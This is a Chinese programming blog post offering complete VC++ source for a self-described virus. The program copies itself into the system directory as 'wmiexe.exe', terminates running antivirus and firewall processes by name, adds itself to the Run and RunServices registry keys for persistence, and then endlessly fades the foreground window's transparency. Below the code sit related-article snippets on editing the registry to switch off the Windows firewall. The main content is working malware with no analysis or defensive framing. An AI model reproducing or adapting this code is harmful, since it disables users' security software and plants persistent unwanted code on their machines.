VC++ 关闭防火墙,写入注册表

最新推荐文章于 2022-01-05 09:31:08 发布
最新推荐文章于 2022-01-05 09:31:08 发布
阅读量2.2k 收藏
点赞数

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run启动相,实现开机自运行。病毒表现为是使用SetLayeredWindowAttributes函数,使当前窗口变为透明。

程序运行先关闭防火墙,写入注册表,再用LoadLibrary和GetProcAddress确定SetLayeredWindowAttributes函数位置,再用GetForegroundWindow得到当前窗口句柄,使其透明。

透明.cpp程序如下

#include "stdafx.h"

#include <winuser.h>

#include <windows.h>

#include <shellapi.h>

#include <tlhelp32.h>

#pragma comment(lib, "User32.lib")

 

unsigned char level;

char buffer[255];

char syspath[100];

char exefile[100];

int err;

HKEY regkey;

HANDLE hMutex;

 

typedef DWORD (WINAPI *PFUNC)(HWND,DWORD,BYTE,DWORD);

bool instr(char* a,char* b)

{

if (strlen(a)<strlen(b)){return false;}

unsigned int i,j;

bool r=false;

for (i=0;i<strlen(a)-strlen(b)+1;i++)

{

if ((a[i]==b[0])||(a[i]==b[0]+32)||(a[i]==b[0]-32))

{

r=true;

for (j=i;j-i<strlen(b);j++)

{

if ((a[j]!=b[j-i])&&(a[j]!=b[j-i]+32)&&(a[j]!=b[j-i]-32)){r=false;break;}

}

}

}

return r;

}

 

void KillProc(bool opt)

{

HANDLE handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

 

PROCESSENTRY32* info=new PROCESSENTRY32;

    info->dwSize=sizeof(PROCESSENTRY32);

if(Process32First(handle,info))

{

if(GetLastError()!=ERROR_NO_MORE_FILES )

{

if (opt)

{

if (instr(info->szExeFile,"wmiexe.exe"))

{

HANDLE h=OpenProcess(0,false,info->th32ProcessID);

TerminateProcess(h,0);

}

}

else

{

if (instr(info->szExeFile,"PFWMAIN.EXE")||

instr(info->szExeFile,"RAVMON.EXE")||

instr(info->szExeFile,"RAVTIMER.EXE")||

instr(info->szExeFile,"RAVSERVICE.EXE")||

instr(info->szExeFile,"CCENTER.EXE"))

{

HANDLE h=OpenProcess(0,false,info->th32ProcessID);

TerminateProcess(h,0);

}

}

 

while(Process32Next(handle,info)!=FALSE)

{

if (opt)

{

if (instr(info->szExeFile,"wmiexe.exe"))

{

HANDLE h=OpenProcess(0,false,info->th32ProcessID);

TerminateProcess(h,0);

}

}

else

{

if (instr(info->szExeFile,"PFWMAIN.EXE")||

instr(info->szExeFile,"RAVMON.EXE")||

instr(info->szExeFile,"RAVTIMER.EXE")||

instr(info->szExeFile,"RAVSERVICE.EXE")||

instr(info->szExeFile,"CCENTER.EXE"))

{

HANDLE h=OpenProcess(0,false,info->th32ProcessID);

TerminateProcess(h,0);

}

}

}

}

}

   CloseHandle(handle);

}

 

 

int APIENTRY WinMain(HINSTANCE hInstance,

                     HINSTANCE hPrevInstance,

                     LPSTR     lpCmdLine,

                     int       nCmdShow)

{

  // TODO: Place code here.

level=255;

int d_level=5;

HWND hwnd;

long win_long;

strset(syspath,0);

strset(exefile,0);

HMODULE module = GetModuleHandle(0); 

GetModuleFileName(module, exefile, sizeof (exefile)); 

 

GetSystemDirectory(syspath,100);

if (!instr(exefile,syspath))

{

strcat(syspath,"\\wmiexe.exe");

while (CopyFile(exefile,syspath,false)==0)

{

err=GetLastError();

if (err==32){KillProc(true);}

Sleep(10);

}

ShellExecute(NULL,"OPEN",syspath,NULL,NULL,1);

Sleep(10);

ExitProcess(0);

}

else

{

hMutex = CreateMutex (NULL, TRUE, "          ");

if (GetLastError () == ERROR_ALREADY_EXISTS){::ExitProcess(0);}

err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",®key);

err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

err=RegCloseKey(regkey);

 

err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices",®key);

err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

err=RegCloseKey(regkey);

 

err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",®key);

err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

err=RegCloseKey(regkey);

 

err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices",®key);

err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

err=RegCloseKey(regkey);

}

HMODULE m_hDLLUser32=LoadLibrary( "user32" );

PFUNC SetLayeredWindowAttributes =(PFUNC)::GetProcAddress( m_hDLLUser32, "SetLayeredWindowAttributes" );

start:

//hwnd=FindWindow("Shell_TrayWnd",NULL);

hwnd=GetForegroundWindow();

if ((hwnd!=0)&&

(hwnd!=GetDesktopWindow())&&

(hwnd!=FindWindow("Shell_TrayWnd",NULL))&&

(hwnd!=FindWindow("Progman",NULL)))

{

win_long=GetWindowLong(hwnd,GWL_EXSTYLE);

SetWindowLong(hwnd,GWL_EXSTYLE,win_long|0x80000);

SetLayeredWindowAttributes(hwnd, NULL, level, 2);

}

Sleep(1);

if (level>=254){d_level*=(-1);Sleep(1000);}

if (level<=50){d_level*=(-1);}

level+=d_level;

goto start;

return 0;

}

CodingSir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
注册表防火墙
11-08
这个小工具能够深层保持注册表,监视对注册表的各种行为,包括读取/写入/修改,并可以对各种行为实施监控和阻止。
VC++操作注册表写入程序注册信息
03-17
内容索引:VC/C++源码,系统相关,注册表 VC++操作注册表写入程序注册信息,向我们演示了如何使用VC++编程操作Windows注册表,并向其写入程序安装注册信息及程序运行时所需的变量值。这对我们开发出符合标准的应用程序...
防火墙注册表
天道酬勤
12-13 3689
<br /><br />年前写的一个程序。目的程序在打开端口的时候,系统自带的防火墙不能有提示<br />GetCurrentAppPath(m_strPath);<br />m_strExePathName = m_strPath+L"demo.exe";   //得到完整的路径<br /><br />RootKey=HKEY_LOCAL_MACHINE;     //注册表主键名称<br />SubKey=L"SYSTEM//ControlSet001//Services//SharedAccess//
C++操作注册表及CMD关闭防火墙
cacheer的博客
06-21 930
void OnModify() { UpdateData(true); HKEY hKEY;//定义有关的hKEY,在查询结束时要关闭 //打开防火墙路径 data_Set相关的hKEY LPCTSTR data_Set= "SYSTEM\\CurrentControlSet\\services\\SharedAccess\\Parameters\\Firewall...
win7注册表关闭防火墙服务器,急问::怎么用注册表关闭windows防火墙??
weixin_28932845的博客
07-29 361
很难,不过你可以看看下面的通过修改注册表打开或关闭Windows防火墙端口,以远程桌面端口3389为例: SetPort.bat @echo offSET TS=HKLM\SYSTEM\CurrentControlSet\Control\Terminal ServerSET LIST=HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Param...
Windows防火墙的信任和阻止文件列表注册表
weixin_30267691的博客
07-22 194
Windows防火墙的信任和阻止文件列表在这个位置[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 在这里创建类似C:\Program Files\Tencent\QQ20...
VC++读、写注册表
10-12
VC++作为Microsoft的C++集成开发环境,提供了丰富的API函数和类库来实现对注册表的读写操作。本资源中的源程序旨在帮助开发者了解和掌握如何在VC++环境中进行注册表的读写,这对于软件设置的保存和恢复、程序初始化...
vc++6.0实现的注册表管理器
03-18
**VC++6.0实现的注册表管理器详解** 注册表是Windows操作系统中的核心数据库,存储着系统和应用程序的各种配置信息。使用VC++6.0编写注册表管理器可以帮助我们更方便、安全地查看、编辑和管理注册表键值,这对于...
VC++实现CStdioFile写入及读取文件并自动换行的方法
09-04
VC++编程中,CStdioFile类是一个非常实用的工具,它允许开发者方便地进行文件的读写操作。CStdioFile类是MFC(Microsoft Foundation Classes)库中的一个类,它继承自CFile类,并且提供了对标准C语言I/O流的支持,...
VC++文件操作与注册表读写操作
11-06
VC++编程中,文件操作和注册表读写是两个重要的功能模块,它们在软件开发中扮演着不可或缺的角色。文件操作允许程序与硬盘上的数据进行交互,而注册表读写则涉及程序对系统配置信息的管理和修改。接下来,我们将...
win7注册表关闭防火墙服务器,win10怎么关闭防火墙服务?注册表方法关闭防火墙方法...
weixin_39717598的博客
07-29 2575
最近有的小伙伴们更新win10系统之后就发现系统防火墙服务无法关闭,大家都清楚系统防火墙会拦截一些有危险因素的文件,比如你下载一个应用程序,但是系统防火墙会觉得该文件含有潜在的危害电脑的因素,这时候又无法关闭防火墙应该怎么办呢?现在小编就教大家使用注册表关闭其中的防火墙服务,解决大家的烦恼。方法/步骤:方法一:1.在键盘上按下“win”+“R”组合键调出运行窗口,随后输入命令“regedit”并“...
VC++定时检测进程,被检测进程挂掉后启动
ccf19881030的专栏
05-27 3981
应用场景 最近使用MFC写一个监控进程的后台程序,需要实现以下的功能: 1、遍历被监控的进程列表,定时(比如1分钟)检测进程列表,如果某个需要被监视的进程未运行,则启动它。 2、防止假死-使用心跳机制(UDP实现后台监控进程与被监控进程的心跳进制) a、被检测进程定时,比如说每隔5秒给后台监控进程发送一个包含进程名称、进程所在绝对路径、发送心跳的时间戳等信息,后台监控进程定时检测遍历每个进程,如果该进程连续3次如15秒没有给监控进程发送心跳包,则说明该进程因为异常情况比如假死了,监控进程则先杀掉该进程然后再
Windows Shell编程-第三章.操作文件
ljmwork的专栏
08-02 1036
第三章 操作文件          我依然清楚地记得,Windows95 的Beta版出现的情形,它在朋友之间和学院中传播,好酷,全新的文件管理器,一种全图标,全彩色可客户化的界面,以及活泼的动画标识使得在文件拷贝和删除方面的操作更容易和直观。          作为真正的软件狂人,我们能为一个比萨饼的奖金开始竞赛,一直以求成为第一个能够编程再造如此行为的人—即,怎样以动画方式拷贝文件。花了几
Windows_Program_Via_C_Translate_Win32编程的背景知识/基础知识_包括基本输入输出机制介绍...
weixin_34090643的博客
03-10 104
SomeBasicBackgroundStoryofTheWin32APIs Win32API背景故事/背景知识 TheWin32applicationprogramminginterface(API)providesbuildingblocksusedbyapplicationswrittenforthe...
域控环境下开启防火墙
qq_42890862的博客
01-05 1923
1、 在服务器上,打开注册表 2、 在注册表内找到HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ WindowsFirewall,将其删除(删除前记得备份,防止出问题时还原) 3、重启防火墙服务(点击管理) 4、 此时可以开启防火墙 ...
VC代码添加防火墙规则
深之JohnChen的专栏
05-20 2583
一、VC代码添加防火墙规则(调用netsh命令)BOOL DealExecCmd(CString strCommandLine) { USES_CONVERSION; STARTUPINFO StartInfo; memset(&amp;StartInfo, '\0', sizeof(StartInfo)); StartInfo.cb = sizeof(StartInfo); ...
VC:windows自带的防火墙的相关编程
nemo2011的专栏
09-08 5444
VC:windows自带的防火墙的相关编程   (VC#.net)在Vista中编程控制防火墙设定——http://www.enet.com.cn/article/2007/0712/A20070712718695.shtml (VB.net)Progra
vc操作windows防火墙的方法
weixin_30835933的博客
07-01 270
收藏该地址,以备不时之需。 http://msdn.microsoft.com/en-us/library/aa364726.aspx 转载于:https://www.cnblogs.com/RascallySnake/p/3165355.html
关闭win10系统自带的windows defender ---注册表
热门推荐
sinat_38213256的博客
05-10 1万+
 做个笔记,原网址在此,侵权删。1. 打开注册表: 快捷键win+R,输入regedit,定位到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService在右侧找到DWORD(32位)值,命名为Start2.  选中start 右键修改 将原来的2修改成4即可。至此完成。注:水平有限,不足之处,请指正。...
win7中vb6写入注册表
最新发布
08-02
在Windows 7操作系统中,想要使用VB6来写入注册表,可以按照以下步骤进行: 1. 打开VB6集成开发环境。 2. 创建一个新的VB6项目,或者打开已有的项目。 3. 在代码编辑器中,使用下面的代码来写入注册表: ``` Dim...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值